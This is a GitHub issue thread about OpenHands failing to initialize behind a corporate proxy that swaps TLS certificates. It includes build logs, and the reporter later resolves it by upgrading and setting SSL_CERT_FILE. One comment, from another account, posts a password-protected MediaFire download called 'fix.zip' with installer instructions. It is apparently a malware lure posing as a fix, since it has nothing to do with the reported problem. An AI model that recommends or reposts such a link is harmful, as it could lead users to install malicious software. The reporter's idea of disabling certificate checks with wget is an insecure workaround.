### ISSUE TITLE
[Bug]: cannot Initialize agent when running in corporate proxy, due to ‘github.com’ is not trusted and doesn't have a known issuer.

### ISSUE THREAD

**Issue by ShiRaTo13** [All-Hands-AI/OpenHands#3591]
### Is there an existing issue for the same bug?

- [X] I have checked the troubleshooting document at https://docs.all-hands.dev/modules/usage/troubleshooting
- [X] I have checked the existing issues.

### Describe the bug

I run clean OpenHands from docker with the default command without change anything (except set WORKSPACE_BASE)
I can run successfully and it can serve web server at localhost:3000 correctly.

However, when i open web server via my browser, during message "_Initializing agent (may take up to 10 seconds)..._" I got error as in attached error below about github.com not trusts.

I found that it is because my machine's company policy try to inject certificates to all websites (which i cannot remove it) and github.com also got changed INTERMEDIATE and ROOT certificates.  I think that's why it got that error.

Normally in any other application, i can workaround this by add ROOT CA certs in my machine's keychain or add command like skip verify ssl for command that support (e.g. git or wget)

Can you please suggest how can i modify to workaround with this issue?   from the log,  i guess it's error while run wget to github.com.   can i add this parameters to _wget --no-check-certificate_ somewhere to ignore certificates?

### Current OpenHands version

```bash
ghcr.io/all-hands-ai/openhands:0.9
```

### Installation and Configuration

```bash
WORKSPACE_BASE=/my/workspace/directory/

docker run -it \
    --pull=always \
    -e SANDBOX_USER_ID=$(id -u) \
    -e WORKSPACE_MOUNT_PATH=$WORKSPACE_BASE \
    -v $WORKSPACE_BASE:/opt/workspace_base \
    -v /var/run/docker.sock:/var/run/docker.sock \
    -p 3000:3000 \
    --add-host host.docker.internal:host-gateway \
    --name openhands-app-$(date +%Y%m%d%H%M%S) \
    ghcr.io/all-hands-ai/openhands:0.9
```

### Operating System

Mac OS

### Reproduction Steps

0. Use corporate machine that inject certificate like github.com's ROOT CA to company certificates
1. Run command start via docker normally
2. Open web browser
3. See error in console log

### Logs, Errors, Screenshots, and Additional Context

> ... (cut to the part that got error) ...
> Hash for docker build directory [/tmp/tmpllbhzsny] (contents: ['Dockerfile', 'code']): 73e02a64ed3d2c2fb74cbb61f59b3488
> 
> Step 1/9 : FROM nikolaik/python-nodejs:python3.11-nodejs22
> 
> ---> 1cd60f754598
> Step 2/9 : RUN apt-get update &&     apt-get install -y wget sudo apt-utils libgl1-mesa-glx libasound2-plugins git &&     apt-get clean &&     rm -rf /var/lib/apt/lists/*
> 
> ---> Using cache
> ---> ef09d27917de
> Step 3/9 : RUN mkdir -p /openhands &&     mkdir -p /openhands/logs &&     mkdir -p /openhands/poetry
> 
> ---> Using cache
> ---> 79be83ac8a55
> Step 4/9 : ENV POETRY_VIRTUALENVS_PATH=/openhands/poetry
> 
> ---> Using cache
> ---> 7b45cc92b54e
> Step 5/9 : RUN if [ ! -d /openhands/miniforge3 ]; then     wget --progress=bar:force -O Miniforge3.sh "https://github.com/conda-forge/miniforge/releases/latest/download/Miniforge3-$(uname)-$(uname -m).sh" &&     bash Miniforge3.sh -b -p /openhands/miniforge3 &&     rm Miniforge3.sh &&     chmod -R g+w /openhands/miniforge3 &&     bash -c ". /openhands/miniforge3/etc/profile.d/conda.sh && conda config --set changeps1 False && conda config --append channels conda-forge";     fi
> 
> ---> Running in a48dd5ca9362
> --2024-08-26 14:04:49--  https://github.com/conda-forge/miniforge/releases/latest/download/Miniforge3-Linux-aarch64.sh
> 
> Resolving github.com (github.com)... 
> 20.205.243.166
> Connecting to github.com (github.com)|20.205.243.166|:443... 
> connected.
> 
> ERROR: The certificate of ‘github.com’ is not trusted.
> ERROR: The certificate of ‘github.com’ doesn't have a known issuer.
> 
> ... (cut only the part that got error) ...
<img width="1119" alt="Screenshot 2567-08-26 at 21 11 42" src="https://github.com/user-attachments/assets/19257035-791d-4b40-b7a3-12c76dc9b4f7">

<img width="1407" alt="Screenshot 2567-08-26 at 21 13 46" src="https://github.com/user-attachments/assets/c14f05b7-87da-4f9a-afd7-1f58ca3e3962">

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ShiRaTo13** [comment]
Update: after upgrade from OpenHands 0.9 to 0.9.1, without change anything else, this problem somehow gone.

Then I get another error after able to build & run as:
> httpx.ConnectError: [SSL: CERTIFICATE_VERIFY_FAILED] ....
just like in issue #2620 

However, i can solved that by set 
> -e SSL_CERT_FILE=/opt/workspace_base/....[path to pem file]
when run docker.   (for a record, i can only set this single env to make it works, i cannot set REQUESTS_CA_BUNDLE or it will failed)

So we can say this issue is closed.   Thank you very much.
